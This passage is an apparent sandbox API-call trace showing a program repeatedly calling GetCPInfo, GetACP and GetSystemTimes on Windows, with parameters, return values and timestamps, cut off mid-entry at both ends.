lpUserTime=0x18fa3c) returned 1 [0118.385] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.385] GetACP () returned 0x4e4 [0118.385] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.385] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.385] GetACP () returned 0x4e4 [0118.385] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.385] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.385] GetACP () returned 0x4e4 [0118.385] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.385] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.385] GetACP () returned 0x4e4 [0118.385] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.385] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.385] GetACP () returned 0x4e4 [0118.386] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.386] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.386] GetACP () returned 0x4e4 [0118.386] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.386] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.386] GetACP () returned 0x4e4 [0118.386] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.386] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.386] GetACP () returned 0x4e4 [0118.386] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.386] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.386] GetACP () returned 0x4e4 [0118.386] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.386] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.386] GetACP () returned 0x4e4 [0118.386] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.386] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.386] GetACP () returned 0x4e4 [0118.386] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.387] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.387] GetACP () returned 0x4e4 [0118.387] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.387] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.387] GetACP () returned 0x4e4 [0118.387] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.387] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.387] GetACP () returned 0x4e4 [0118.387] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.387] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.387] GetACP () returned 0x4e4 [0118.387] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.387] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.387] GetACP () returned 0x4e4 [0118.387] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.387] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.387] GetACP () returned 0x4e4 [0118.387] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.387] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.388] GetACP () returned 0x4e4 [0118.388] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.388] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.388] GetACP () returned 0x4e4 [0118.388] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.388] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.388] GetACP () returned 0x4e4 [0118.388] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.388] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.388] GetACP () returned 0x4e4 [0118.388] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.388] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.388] GetACP () returned 0x4e4 [0118.388] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.388] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.388] GetACP () returned 0x4e4 [0118.388] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.388] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.388] GetACP () returned 0x4e4 [0118.388] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.389] GetACP () returned 0x4e4 [0118.389] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.389] GetACP () returned 0x4e4 [0118.389] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.389] GetACP () returned 0x4e4 [0118.389] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.389] GetACP () returned 0x4e4 [0118.389] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.389] GetACP () returned 0x4e4 [0118.389] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.389] GetACP () returned 0x4e4 [0118.389] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.389] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.390] GetACP () returned 0x4e4 [0118.390] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.390] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.390] GetACP () returned 0x4e4 [0118.390] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.390] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.390] GetACP () returned 0x4e4 [0118.390] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.390] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.390] GetACP () returned 0x4e4 [0118.390] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.390] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.390] GetACP () returned 0x4e4 [0118.390] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.390] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.390] GetACP () returned 0x4e4 [0118.390] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.390] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.390] GetACP () returned 0x4e4 [0118.390] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.391] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.391] GetACP () returned 0x4e4 [0118.391] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.391] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.391] GetACP () returned 0x4e4 [0118.391] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.391] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.391] GetACP () returned 0x4e4 [0118.391] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.391] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.391] GetACP () returned 0x4e4 [0118.391] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.391] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.391] GetACP () returned 0x4e4 [0118.391] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.391] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.391] GetACP () returned 0x4e4 [0118.391] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.391] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.392] GetACP () returned 0x4e4 [0118.392] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.392] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.392] GetACP () returned 0x4e4 [0118.392] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.392] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.392] GetACP () returned 0x4e4 [0118.392] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.392] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.392] GetACP () returned 0x4e4 [0118.392] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.392] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.392] GetACP () returned 0x4e4 [0118.392] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.392] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.392] GetACP () returned 0x4e4 [0118.392] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.392] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.392] GetACP () returned 0x4e4 [0118.392] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.393] GetACP () returned 0x4e4 [0118.393] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.393] GetACP () returned 0x4e4 [0118.393] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.393] GetACP () returned 0x4e4 [0118.393] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.393] GetACP () returned 0x4e4 [0118.393] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.393] GetACP () returned 0x4e4 [0118.393] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.393] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.393] GetACP () returned 0x4e4 [0118.393] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.394] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.394] GetACP () returned 0x4e4 [0118.394] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.394] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.394] GetACP () returned 0x4e4 [0118.394] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.394] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.394] GetACP () returned 0x4e4 [0118.394] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.394] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.394] GetACP () returned 0x4e4 [0118.394] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.394] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.394] GetACP () returned 0x4e4 [0118.394] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.395] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.395] GetACP () returned 0x4e4 [0118.395] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.395] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.395] GetACP () returned 0x4e4 [0118.395] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.395] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.395] GetACP () returned 0x4e4 [0118.395] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.395] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.395] GetACP () returned 0x4e4 [0118.395] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.442] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.442] GetACP () returned 0x4e4 [0118.442] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.486] GetACP () returned 0x4e4 [0118.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.486] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.486] GetACP () returned 0x4e4 [0118.486] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.487] GetACP () returned 0x4e4 [0118.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.487] GetACP () returned 0x4e4 [0118.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.487] GetACP () returned 0x4e4 [0118.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.487] GetACP () returned 0x4e4 [0118.487] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.487] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.488] GetACP () returned 0x4e4 [0118.488] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.488] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.488] GetACP () returned 0x4e4 [0118.488] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.489] GetACP () returned 0x4e4 [0118.489] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.489] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: 